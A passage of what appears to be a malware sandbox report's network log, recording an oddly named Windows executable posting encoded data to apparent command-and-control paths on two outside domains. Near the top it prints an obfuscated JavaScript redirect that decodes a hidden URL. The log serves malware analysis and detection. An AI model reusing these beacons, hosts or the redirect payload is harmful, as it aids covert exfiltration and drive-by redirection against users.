                                                                      Data Raw: 35 61 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 38 33 4d 7a 4d 78 4c 6d 52 35 4d 44 45 77 63 32 49 75 63 48 4a 76 4f 6a 67 35 4d 54 45 3d 27 29 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 5a<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly83MzMxLmR5MDEwc2IucHJvOjg5MTE=')</script>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.64973069.57.163.64806404C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:07:17.337074995 CET779OUTPOST /ir2n/ HTTP/1.1
                                                                      Host: www.openhorizons.pro
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.openhorizons.pro
                                                                      Referer: http://www.openhorizons.pro/ir2n/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 211
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 71 32 50 51 2f 4c 7a 54 4c 70 76 31 52 49 58 37 55 77 57 34 75 5a 47 44 34 4c 46 4e 46 37 49 6a 36 39 4e 2f 75 6c 68 51 74 47 72 64 65 67 4d 66 6a 58 48 44 6d 33 4c 6e 44 6f 45 4e 46 4f 66 6d 6b 4a 69 73 46 71 2f 5a 42 67 53 79 6d 58 68 53 4d 62 4f 2f 32 73 4c 49 46 4c 5a 57 46 39 34 7a 30 72 56 72 47 70 55 6f 76 51 70 69 72 79 69 50 62 65 33 36 56 46 46 76 6b 44 31 6b 77 55 53 4d 67 50 62 69 47 51 47 4d 75 71 4e 75 74 64 76 45 57 52 65 39 36 44 4e 4b 31 52 69 43 6d 4a 48 76 2f 6b 41 54 6c 33 79 4b 59 66 46 6c 5a 70 4b 62 33 48 57 7a 39 71 4e 44 34 35 47 49 79 5a 44 4e 5a 33 63 67 78 52 6d 70 30 2f 44 72
                                                                      Data Ascii: 8jT4kL=q2PQ/LzTLpv1RIX7UwW4uZGD4LFNF7Ij69N/ulhQtGrdegMfjXHDm3LnDoENFOfmkJisFq/ZBgSymXhSMbO/2sLIFLZWF94z0rVrGpUovQpiryiPbe36VFFvkD1kwUSMgPbiGQGMuqNutdvEWRe96DNK1RiCmJHv/kATl3yKYfFlZpKb3HWz9qND45GIyZDNZ3cgxRmp0/Dr
                                                                      Nov 28, 2024 10:07:18.631484032 CET533INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 28 Nov 2024 09:07:18 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.64973169.57.163.64806404C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:07:20.010006905 CET803OUTPOST /ir2n/ HTTP/1.1
                                                                      Host: www.openhorizons.pro
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.openhorizons.pro
                                                                      Referer: http://www.openhorizons.pro/ir2n/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 235
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 71 32 50 51 2f 4c 7a 54 4c 70 76 31 65 4a 6e 37 58 52 57 34 76 35 47 41 68 37 46 4e 50 62 49 6e 36 39 42 2f 75 67 42 6d 74 56 50 64 5a 42 38 66 67 56 76 44 68 33 4c 6e 62 34 45 43 4c 75 66 58 6b 4a 76 54 46 71 44 5a 42 67 57 79 6d 54 74 53 4d 71 4f 38 73 63 4c 4b 63 62 5a 51 64 64 34 7a 30 72 56 72 47 70 41 47 76 51 68 69 72 47 65 50 61 38 50 31 63 6c 46 73 74 6a 31 6b 36 45 53 49 67 50 62 41 47 56 65 71 75 70 35 75 74 66 33 45 56 41 65 2b 67 54 4e 49 34 78 6a 32 32 63 69 33 37 69 52 7a 6c 58 43 61 4d 39 6c 44 52 2f 58 42 72 30 57 51 76 36 74 42 34 37 65 36 79 35 44 6e 62 33 6b 67 6a 47 71 4f 37 4c 6d 49 2b 46 64 78 4a 56 75 49 43 49 4d 4c 33 78 76 72 2f 68 69 34 62 51 3d 3d
                                                                      Data Ascii: 8jT4kL=q2PQ/LzTLpv1eJn7XRW4v5GAh7FNPbIn69B/ugBmtVPdZB8fgVvDh3Lnb4ECLufXkJvTFqDZBgWymTtSMqO8scLKcbZQdd4z0rVrGpAGvQhirGePa8P1clFstj1k6ESIgPbAGVequp5utf3EVAe+gTNI4xj22ci37iRzlXCaM9lDR/XBr0WQv6tB47e6y5Dnb3kgjGqO7LmI+FdxJVuICIML3xvr/hi4bQ==
                                                                      Nov 28, 2024 10:07:21.216412067 CET533INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 28 Nov 2024 09:07:21 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      8192.168.2.64973269.57.163.64806404C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:07:22.666096926 CET1816OUTPOST /ir2n/ HTTP/1.1
                                                                      Host: www.openhorizons.pro
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.openhorizons.pro
                                                                      Referer: http://www.openhorizons.pro/ir2n/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 1247
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 71 32 50 51 2f 4c 7a 54 4c 70 76 31 65 4a 6e 37 58 52 57 34 76 35 47 41 68 37 46 4e 50 62 49 6e 36 39 42 2f 75 67 42 6d 74 56 48 64 65 7a 30 66 36 30 76 44 67 33 4c 6e 46 6f 45 42 4c 75 66 4f 6b 4e 43 61 46 71 50 6e 42 69 2b 79 6d 32 78 53 4b 59 32 38 35 4d 4c 4b 42 4c 5a 56 46 39 34 71 30 74 31 76 47 70 51 47 76 51 68 69 72 41 36 50 54 4f 33 31 61 6c 46 76 6b 44 31 6f 77 55 53 67 67 50 44 36 47 55 72 58 75 61 68 75 74 38 50 45 51 32 4b 2b 34 44 4e 4f 2f 78 6a 75 32 63 6d 57 37 6d 4a 4a 6c 56 69 30 4d 2b 35 44 53 59 2b 68 70 48 6d 39 30 70 70 56 75 4a 57 52 36 4e 4c 6f 59 6c 34 63 75 58 36 4e 35 59 61 68 35 7a 74 38 4d 54 33 75 4e 65 34 77 38 48 57 39 7a 6a 7a 71 5a 78 4c 6c 71 37 6f 42 53 43 64 68 43 50 67 6b 48 73 4d 5a 56 33 69 35 36 75 6e 62 77 59 4e 39 31 68 62 66 45 74 35 47 46 69 57 6c 6e 53 48 42 65 39 58 4e 46 45 6c 67 49 67 57 43 43 49 30 75 73 36 79 4c 58 76 49 67 78 46 2f 43 4c 61 34 4f 57 2b 64 66 6f 34 70 65 49 6d 68 72 74 53 63 64 55 7a 31 63 67 42 50 53 64 63 79 [TRUNCATED]
                                                                      Data Ascii: 8jT4kL=q2PQ/LzTLpv1eJn7XRW4v5GAh7FNPbIn69B/ugBmtVHdez0f60vDg3LnFoEBLufOkNCaFqPnBi+ym2xSKY285MLKBLZVF94q0t1vGpQGvQhirA6PTO31alFvkD1owUSggPD6GUrXuahut8PEQ2K+4DNO/xju2cmW7mJJlVi0M+5DSY+hpHm90ppVuJWR6NLoYl4cuX6N5Yah5zt8MT3uNe4w8HW9zjzqZxLlq7oBSCdhCPgkHsMZV3i56unbwYN91hbfEt5GFiWlnSHBe9XNFElgIgWCCI0us6yLXvIgxF/CLa4OW+dfo4peImhrtScdUz1cgBPSdcyvBZjCr8i/rUXrgOe+WXN5zDBkF05DxDb3rrTZNi9aIZ6u2lmU/PYxI7d5pcUhofk0//RWCQ0aSN3DXMfzqBGC6Otfvb2MkE9DPZKoZYNualUyNFvB8UWgvbvemsYYxQ4g6AODninH1wzwcOJvgkeDCamh8GLs1zIVkCNBwfh7GY4tdTeI3phVZYjPhpguH2ZnchWwTt2m4T1Kl2DtIm9NhBBoqPYpZ2mCgtJ+A/sxW4NRIOr47wT5XlSOh6cQB7s17N1Pn1jh4brqVTuQX9Q60O6RNw6gq51+diQpvf5m/4Cc4YUL46GNVyYmK5wLl/A6yv54fWcOJnWJCbr6ZZ/o6RdRliLZGzTdiJG+mYZj+xNlzv80b9vo9g1xxwodtC8G56dpemAA2DprWlBWDFHlAaNAalinLpCm9RBeN96PCyW8xLNfOOPzDi30qEn0+VBRJWBqiaQc5d/wD+0NQPa7pJLE+W5zIGAOWBwfEbmKagFS8FzsDII1MgOkT9y4bMfMbeedCAX5uLnNM5FCNXVZnai0zPu+YMKxsMuSDm7onANlvR4E/MKjkhPgi5lJEDCrb5s1clOBslZiqFCbZeIfDLRpnRdim6dpj7fD9R24SQuLtr05Uevs0NcUutGC90cFMPA1QqrMTzS5Q9j4TT5ovd4sJ8ErK3Dor [TRUNCATED]
                                                                      Nov 28, 2024 10:07:23.880187035 CET533INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 28 Nov 2024 09:07:23 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      9192.168.2.64973369.57.163.64806404C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:07:25.318721056 CET518OUTGET /ir2n/?8jT4kL=n0nw8/H3BoTEcN7zdQK4h5Pq0YxvTroU8JdHjhF/1WvMYiVgjVi7rxPCE4QNN9j365ahaJvOAjH+lnxKDIqr8fD4f6QXWf5NwsAjHJc3hwUW8hetWLjodHBwgSRg3Fz4puXvFwU=&-pmdf=w6-PZpOHNlat HTTP/1.1
                                                                      Host: www.openhorizons.pro
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Nov 28, 2024 10:07:26.583642960 CET548INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 28 Nov 2024 09:07:26 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      10192.168.2.649734104.21.6.17806404C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:07:32.193804979 CET785OUTPOST /vn7h/ HTTP/1.1
                                                                      Host: www.topkapiescortg.xyz
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.topkapiescortg.xyz
                                                                      Referer: http://www.topkapiescortg.xyz/vn7h/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 211
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 6c 6c 53 70 48 42 52 68 66 62 56 47 53 4a 67 72 7a 59 57 34 6c 70 68 34 79 39 5a 76 77 67 79 58 72 6f 74 2b 54 49 70 4c 41 65 67 2f 54 36 53 2b 62 53 65 72 52 42 54 71 39 43 67 53 46 51 52 58 73 68 45 4a 57 30 52 43 61 4b 4f 70 7a 51 39 37 49 42 77 58 57 57 5a 52 54 70 54 77 41 50 70 39 52 71 66 47 4a 4d 4f 5a 50 37 31 4a 55 79 71 79 4a 4d 6d 47 35 59 71 41 66 32 72 46 45 48 64 44 74 47 4a 68 57 6d 78 30 69 44 37 61 34 6d 76 78 54 4e 6a 50 71 4f 64 38 6b 67 44 35 61 4b 53 63 47 79 4a 7a 5a 6f 6f 43 68 6b 4a 46 4c 44 63 79 65 69 33 43 2f 50 73 6b 44 4e 50 4c 4c 6c 42 4d 47 6e 44 32 66 38 39 70 48 68 34 78
                                                                      Data Ascii: 8jT4kL=llSpHBRhfbVGSJgrzYW4lph4y9ZvwgyXrot+TIpLAeg/T6S+bSerRBTq9CgSFQRXshEJW0RCaKOpzQ97IBwXWWZRTpTwAPp9RqfGJMOZP71JUyqyJMmG5YqAf2rFEHdDtGJhWmx0iD7a4mvxTNjPqOd8kgD5aKScGyJzZooChkJFLDcyei3C/PskDNPLLlBMGnD2f89pHh4x
                                                                      Nov 28, 2024 10:07:33.493359089 CET1071INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 28 Nov 2024 09:07:33 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dhbHECWAR1vHgoaHiFRcY0nqh5rC4RhAW3wIl2UTgcz3o6gCPLujunNBLYfGDW3BHSFED1sbjqEnyJWbX0r2yOEtQpMHWcjJ0dcqxk2JTSHR3JkcUvJTY9awsYvfBbmqUBBL%2B0OCx30o"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e9935543f778c2d-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2057&min_rtt=2057&rtt_var=1028&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=785&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a
                                                                      Data Ascii: eaTn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(bY<;
                                                                      Nov 28, 2024 10:07:33.494087934 CET5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      11192.168.2.649735104.21.6.17806404C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:07:34.998898029 CET809OUTPOST /vn7h/ HTTP/1.1
                                                                      Host: www.topkapiescortg.xyz
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.topkapiescortg.xyz
                                                                      Referer: http://www.topkapiescortg.xyz/vn7h/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 235
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 6c 6c 53 70 48 42 52 68 66 62 56 47 54 6f 77 72 77 35 57 34 77 5a 68 37 75 4e 5a 76 2b 41 79 62 72 6f 70 2b 54 4d 35 62 44 6f 49 2f 53 65 57 2b 61 51 6d 72 45 42 54 71 33 69 67 54 59 67 51 56 73 68 49 76 57 31 74 43 61 4b 71 70 7a 52 4e 37 49 32 6b 49 57 47 5a 54 59 4a 54 32 4e 76 70 39 52 71 66 47 4a 4d 4b 2f 50 37 74 4a 55 43 36 79 49 74 6d 42 6d 6f 71 44 49 47 72 46 4a 6e 64 50 74 47 49 45 57 6b 46 4e 69 41 44 61 34 6d 2f 78 55 59 44 41 6c 4f 64 2b 67 67 43 65 63 75 66 45 4f 78 59 6f 57 35 38 44 33 6d 5a 47 4f 31 42 6f 43 52 33 68 74 66 4d 6d 44 50 58 35 4c 46 42 6d 45 6e 37 32 4e 72 78 4f 49 56 64 53 4c 56 33 7a 39 2f 41 50 55 49 66 77 4e 6d 2f 56 59 34 48 70 44 67 3d 3d
                                                                      Data Ascii: 8jT4kL=llSpHBRhfbVGTowrw5W4wZh7uNZv+Aybrop+TM5bDoI/SeW+aQmrEBTq3igTYgQVshIvW1tCaKqpzRN7I2kIWGZTYJT2Nvp9RqfGJMK/P7tJUC6yItmBmoqDIGrFJndPtGIEWkFNiADa4m/xUYDAlOd+ggCecufEOxYoW58D3mZGO1BoCR3htfMmDPX5LFBmEn72NrxOIVdSLV3z9/APUIfwNm/VY4HpDg==
                                                                      Nov 28, 2024 10:07:36.272105932 CET1077INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 28 Nov 2024 09:07:36 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mdJsoZlbpx560DUzWwQ6dklk5igLwiq3S6rp%2B9CwTDCjyRU93S5q8hQtUXCDQ7DjK3SoU1VdggVgALrQtuQB%2FvbStfVxkZvT%2BxsqT0URJSt5IOsPRl5HoQNfnl1MY%2F12LcBZURL3qAMR"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e9935659bfc7c93-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2074&min_rtt=2074&rtt_var=1037&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=809&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
